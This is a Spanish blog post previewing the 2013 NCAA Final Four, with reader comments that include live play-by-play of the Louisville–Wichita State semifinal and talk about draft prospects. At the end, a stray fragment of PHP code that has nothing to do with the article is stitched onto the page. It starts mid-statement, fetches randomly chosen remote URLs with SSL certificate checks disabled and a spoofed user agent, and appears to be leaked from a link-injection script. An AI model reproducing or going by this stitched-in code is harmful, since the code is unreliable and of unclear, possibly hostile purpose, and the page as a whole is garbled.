March Madness 2013: Final Four

05 de April de 2013 por txusma

3 semanas de locura están a punto de finalizar en los próximos días. Dice Rick Pitino que a la Final Four han llegado 4 equipos capaces de llevarse el campeonato y no le falta razón. Incluso Wichita, la a priori cenicienta del grupo, ha demostrado tener argumentos para vencer a cualquier equipo que se ponga por delante.

Lousville (1) – Wichita (9)

Los Cardinals llevan 14 partidos consecutivos ganando pero mal harán de confiarse ante un equipo que no quiere ser considerado el más débil de los 4. Una vez en la Final Four todo puede pasar y la ilusión y la motivación pueden pesar más que la teórica calidad de un equipo.

Como comentamos en el resumen anterior, Louisville llega a Atlanta tras demostrar una gran fortaleza mental y una calidad fuera de toda duda. Tras superar con facilidad sus primeros compromisos tuvieron que sobreponerse a enfermedades y lesiones para poder llegar hasta aquí. Su victoria ante Duke ha impresionado a aficionados y rivales y parecen que parte como los principales favoritos. Fueron capaces de anular el juego exterior de Duke a la vez que el suyo (Russ Smith y Peyton Silva) anotaba compulsivamente. Por dentro Gorgui Dieng impuso su ley y los Cardinals se impusieron también el aspecto reboteador. De todas maneras, se enfrentan a un equipo muy equilibrado que basa su juego en la energía y la defensa. Se trata de un conjunto muy profundo donde cualquiera puede dar un paso al frente. Cuentan con un buen base como Malcolm Armstead y un bastión en la zona como Carl Hall. Además, jugadores como Ron Baker o Cleanthony Early se están mostrando muy efectivos. Pueden plantar a cara a los Cardinals en sus parcelas favoritas (intensidad, rebote, juego exterior…) y tienen profundidad suficiente para vencer por agotamiento. Con la baja de Ware, alerta si Smith o Silva tienen problemas de faltas.

Nuestra apuesta: Lousville Cardinals. Los Shockers les van a poner las cosas muy difíciles pero el equipo de Pittino demostrará que son superiores y que su racha de victorias no tiene nada de casual. 

Syracuse (4) – Michigan (4)

Hagan juego señores. ¿Podrá la tela de araña de los Orange atrapar a Trey Burke, Tim Hardaway Jr., Glen Robinson III y compañía? Si alguien puede pararlos es, sin duda, el equipo de Jim Boeheim.

Todos hemos podido comprobar que Trey Burke es capaz de anotar, la duda es si será capaz de hacerlo ante la increíble defensa 2-3 que practica Syracuse. Creo que Burke debería aprovechar la atención que concentrará en su figura para distribuir el balón hacia sus compañeros. Hardaway, Robinson e, incluso Nik Stauskas, han demostrado que son capaces de anotar con solvencia desde fuera. Si Syracuse permite que Burke piense y el balón fluya con fluidez estarán perdidos. Además, no podemos olvidarnos de uno de los jugadores que más ha mejorado en los últimos meses, Mitch McGary. Alerta con el roto que puede hacer en la zona orange. Sin embargo, los de Boeheim llegan a la Final Four en el mejor momento del año practicando una defensa que debería aparecer en todos los manuales del baloncesto. Llegan físicamente perfectos y cuentan con muchos recursos para desgastar a los Wolverines. Michael Carter-Williams ha dominado a su antojo los últimos partidos jugados en el torneo y de él depende buena parte del éxito de su equipo porque de nada te sirve dejar al contrario en 40 puntos si tú no eres capaz de anotar, como mínimo, 41.

Nuestra apuesta: Michigan Wolverines. Si el equipo de Burke empieza el partido con confianza y anotando con fluidez la fortaleza mental de los Orange, esencial para practicar su estilo de juego, se vendrá abajo. De todas maneras, este partido sí que lo vemos al 50%.

Lousiville (1) – Michigan (4)

Ciencia ficción. Esta vez los Wolverines se encontrarán con un equipo capaz de defender y atacar con solvencia. Creo que los Cardinals serían demasiados para ellos a no ser que Trey Burke se encaparre en pensar lo contrario.

Nuestra apuesta: Lousville Cardinals.

Comenta

35 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    El duelo antagónico Syracuse – Michigan promete muchísimo,y es una prueba de fuego para dos de los mejores bases del próximo draft.Me gusta ese apunte de Stauskas,puede ser un factor.Despertó en el pasado partido y en éste,dado el sistema defensivo del equipo rival,puede ser el tio que abra la puerta.

    C’mon McGary! xDDD

      Citar

  2. MagicJohnson32 dice:
    #2

    ¡El regreso del melocotón!

      Citar

  3. Esteban dice:
    #3

    burke, hadaway y robinson se llevaran el final four
    El primero por ser crac y los segundos por tener nombres de cracks

      Citar

  4. Jose Luis dice:
    #4

    ¿Alguien viendo esto?

    Yo sí. Wichita ha empezado bien aunque la presión de los Cardinals consiguió equilibrar el partido. Mala primera parte de ambos equipos, destacando Russ Smith y Baker, y mal Armstead, Peyton Siva y . En la segunda parte, los Shockers se van hasta los 12 puntos de ventaja 47-35 y Louisville pierde un poco la compostura, encajan mates, tiran por tirar… Wichita sin perder el balón, 20 minutos consecutivos, ante la presión de los Cardinals, es genial. Ha entrado un tal Henderson creo o algo así, que juega por la lesión de Ware, promediando 1ppp en la regular season… y se clava dos triples rapidito y se ponen a 6. Hancock y Behanan aparecen poco a poco, y ahora mismo 53-47 tras un triple de Cotton.

    Por ahora, los mejores para mí Baker y Russ Smith, aunque no esté muy acertado en el tiro.

      Citar

  5. Jose Luis dice:
    #5

    Entonándose los titulares de los de Pitino, que por ahora vivían del banquillo. Behanan y Siva anotan. 55-51

      Citar

  6. Jose Luis dice:
    #6

    Otra de Behanan, pérdida de Wichita y triple de Hancock. 55-56 arriba los Cardinals.

      Citar

  7. Jose Luis dice:
    #7

    Pérdida y recuperación Wichita, canasta y falta, 58-56 Wichita.

      Citar

  8. Jose Luis dice:
    #8

    Nervios en Wichita ahora aunque no están aprovechando los Cardinals.

      Citar

  9. Jose Luis dice:
    #9

    5:20 para el final, 58-58

      Citar

  10. Jose Luis dice:
    #10

    Mate de Russ Smith tras otra pérdida. Wichita 20 minutos sin perder un balón, y en 2-3 minutos han perdido 4…

      Citar

  11. Jose Luis dice:
    #11

    2 arriba los Cardinals tras canasta de Behanan, 2:30

      Citar

  12. Jose Luis dice:
    #12

    Otra pérdida de Wichita… puf!

      Citar

  13. Jose Luis dice:
    #13

    Triiiiiiple de Hancock, Louisville gana 60-65, máxima diferencia, a falta de 2 minutos

      Citar

  14. Jose Luis dice:
    #14

    Otra más de Hancock, 19 puntos para un suplente… 62-67.

      Citar

  15. Jose Luis dice:
    #15

    Canasta de Early, 64-67, menos de 1 minuto por jugarse, bola Cardinals.

      Citar

  16. Jose Luis dice:
    #16

    1 de 2 en tiros libres Russ Smith (lleva 2-8) y canasta tras rebote ofensivo de Cleanthony Early creo. 66-68, 31 segundos.

      Citar

  17. Jose Luis dice:
    #17

    De nuevo mandan a Russ Smith a los tiros libres… veamos, lleva 2-8

      Citar

  18. Jose Luis dice:
    #18

    Anota los dos. 68-70 tras rebote ofensivo y quedan 12 segundos.

      Citar

  19. Jose Luis dice:
    #19

    Falta sobre Hancock, 8 segundos quedan, va con los dos tiros libres.

      Citar

  20. Jose Luis dice:
    #20

    Anota el primero, 20 puntazos ya

      Citar

  21. Jose Luis dice:
    #21

    Increíble… falla el tiro libre Hancock, el rebote ofensivo lo luchan entre él y Baker, salto entre dos… y la flechita está para Louisville, con lo que casi fin de partido… tiros para Russ Smith, 5 segundos.

      Citar

  22. Jose Luis dice:
    #22

    Anota el primero, falla el segundo, 4 arriba los Cardinals, lanza Baker a la desesperada y final del partido.

      Citar

  23. Jose Luis dice:
    #23

    Me voy a la cama, mañana veré qué tal la segunda semifinal.

      Citar

  24. MagicJohnson32 dice:
    #24

    Jose Luis:
    Me voy a la cama, mañana veré qué tal la segunda semifinal.

    ¿Cuándo es?

      Citar

  25. Jose Luis dice:
    #25

      Citar

  26. Ruxixón dice:
    #26

    MagicJohnson32: ¿Cuándo es?

    Ya fue,así que si alguien quiere verla sin saber el resultado SPOILER SPOILER Gran partido en cuanto a nivel de tensión,variantes entre los dos equipos,no tanto a nivel individual donde los Burke,Carter-Williams,Southerland..decepcionaron.Buena primera parte de los Wolverines que anotaron 36 puntos cuando la media de anotación que recibe la zona de los Orange es de 25 puntos en ese periodo.

    En la segunda parte se equilibró la balanza a favor de Syracuse usando sus principales armas: defensa y rebote ofensivo.La anotación la ponía CJ Fair con un Carter Williams totalmente desaprecido.Michigan no anotaba fácil lo que sirvió a los Orange para ir acercándose al marcador aunque nunca llegaron a empatar.Con 3 minutos por jugarse presión a toda la cancha de los Cuse,mandando a la línea de personal a los Wolverines que fallaron bastante.LLegaron a ponerse a 2 puntos pero una decisión arbitral para mi equivocada (falta en defensa de MCW cuando creo que era ataque de Burke) y finalmente decisiones precipitadas en ataque cerraron el partido a favor del equipo amarillo.

    Louisville – Michigan finalísima,8 de abril.

      Citar

  27. MagicJohnson32 dice:
    #27

    Jose Luis:
    fue anoche, ganó Michigan a Syracuse.

    http://www.ncaa.com/game/basketball-men/d1/2013/04/06/syracuse-michigan

    Ah, ok. Pero la final es mañana ¿no?

      Citar

  28. Ruxixón dice:
    #28

    Carter-Williams: otro añito más en la NCAA le sentaba muy bien.Su principal arma es su longitud y envergadura desde la posición de base y a partir de ello ser capaz de sumar en varios apartados,pero le hace falta madurez en su juego,ser más constante y sobre todo mejorar su tiro.Además a nivel defensivo habría que ver cómo es capaz de trasladar su juego a la defensa individual que existe en los pros.Desafortunadamente en Syracuse parece difícil que sea capaz de aprender en este aspecto.

    Burke: tiene lo importante que es la calidad.De vez en cuando toma decisiones precipitadas.Por ejemplo,no acabo de entender esa querencia por tirarse triples desde su casa aunque vaya metiendo de cuando en cuando y parece tener confianza desde esa distancia pero considero que debía ser algo esporádico.Está para dar el salto desde luego.Tiene carácter.Me recuerda mucho a los Kemba Walker y Ty Lawson de la universidad.

    Glen Robinson III: a pesar de estar un poco escondido en la nave de Michigan,le auguro un buen futuro,de hecho creo que tiene más futuro NBA que Burke por ejemplo.Tiene las condiciones físicas y buena mano.

    McGary: me encanta.Fue clave en el partido contra Syracuse jugando de poste en medio de la zona.Tiene buena IQ y carácter.Algunos mocks lo ponen ya en este draft pero otro año más en Michigan,siendo referente y haciendo buenos números toda la temporada es lo suyo.Me recuerda un huevo a Hansbrough,quizás menos coraje que éste pero algo más de fundamentos,aunque este tipo de jugadores lo tienen difícil en la NBA.Es algo similar a lo que le pasa a los Reddick y Fredette.

      Citar

  29. Jose Luis dice:
    #29

    MagicJohnson32: Ah, ok. Pero la final es mañana ¿no?

    La final mañana por la noche, correcto.

      Citar

  30. Ruxixón dice:
    #30

    Llegó el día

      Citar

  31. Txusma dice:
    #31

    Ruxixón:
    Llegó el día

    Mantengo lo que escribí hace unos días: apuesto por Louisville aunque reconozco que los Wolverines tienen armas de sobra para tumbarlos.

      Citar

  32. Jose Luis dice:
    #32

    Yo creo que Louisville tiene equipo para ganar, les vi el otro día y pese a los malos partidos de Smith y Siva (y Behanan tampoco estuvo muy fino) supieron aguantar la presión y el verse 12 abajo en el tercer cuarto, y al final se llevaron la victoria.

    No he visto a los Wolverines, pero apuesto por los Cardinals.

      Citar

  33. Jose Luis dice:
    #33

    ¿Es a las 3:30? la madre que los parió

      Citar

  34. Ruxixón dice:
    #34

    Son favoritos los Cardinals desde luego,han sido el mejor conjunto a lo largo del torneo y han sido los únicos que han hecho prevalecer el seed 1,demostrando fortaleza en los peores momentos.Michigan ha sido un equipo de picos,siendo McGary y Glenn Robinson III los más regulares.La mejor versión de Michigan puede poner las cosas difíciles a Louisville y yo espero eso de la mano de Burke,que hoy se puede ganar un TOP 5 en el draft.

      Citar

  35. Ruxixón dice:
    #35

    Jose Luis:
    ¿Es a las 3:30? la madre que los parió

    Mañana lo echan en Sportmanía a las 14.00

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>